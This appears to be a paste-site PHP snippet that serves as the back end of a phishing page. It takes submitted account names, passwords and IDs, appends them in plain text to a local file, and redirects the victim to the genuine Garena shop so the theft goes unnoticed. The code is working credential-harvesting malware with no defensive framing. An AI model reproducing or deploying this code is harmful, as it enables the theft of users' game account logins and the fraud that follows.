Untitled
2 years ago in PHP
<?php
file_put_contents("user.txt", "Account: " . $_POST['text'] . " Pass: " . $_POST['password'] . " ID: " . $_POST['ID'] . "\n", FILE_APPEND);
header('Location: https://shop.garena.my/app');
exit();